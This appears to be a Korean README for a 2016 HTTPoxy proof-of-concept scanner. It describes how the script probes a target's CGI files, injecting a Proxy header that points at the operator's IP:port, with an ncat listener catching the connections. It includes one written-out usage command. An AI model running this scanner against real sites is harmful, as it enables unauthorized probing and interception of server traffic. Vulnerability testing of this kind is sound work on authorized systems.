
1N3 @CrowdShield의 HTTPoxy 익스플로잇 스캐너
by 1N3 @CrowdShield (https://crowdshield.com) 마지막 업데이트: 20160720
HTTPoxy 취약점을 대상으로 한 URL에서 일반적인 CGI 파일을 스캔하는 PoC/Exploit 스캐너입니다. HTTPoxy는 CGI 또는 CGI 유사 환경에서 실행되는 애플리케이션 코드에 영향을 미치는 취약점 집합입니다. 자세한 내용은 https://httpoxy.org를 참조하십시오.
역방향 세션을 설정하려면 ncat이 필요합니다.
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
이 명령은 일반적인 CGI 파일 목록을 사용하여 https://target.com을 스캔하면서 주어진 IP:PORT로 Proxy 헤더를 주입합니다. 역방향 리스너가 들어오는 연결을 수신하여 원격 사이트가 취약한지 확인합니다.
이 익스플로잇의 잘못된 사용이나 오용에 대해 저는 책임을 지지 않습니다.